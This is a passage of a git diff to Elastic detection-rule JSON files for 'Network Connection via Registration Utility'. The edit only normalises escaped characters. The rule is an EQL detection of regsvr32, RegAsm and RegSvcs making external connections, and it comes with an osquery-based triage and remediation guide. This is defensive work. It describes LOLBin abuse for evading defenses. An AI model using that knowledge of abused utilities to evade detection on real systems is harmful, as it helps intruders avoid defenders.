can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -104,7 +104,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json index 3b697c33c7f..a0b7400bd7f 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -105,7 +105,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json index 27a3507de2e..861a5514f35 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_106.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -97,7 +97,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json index 378fb960f63..d3609509979 100644 --- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json +++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json index 89489a83fa4..f96d62fc19d 100644 --- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json +++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json 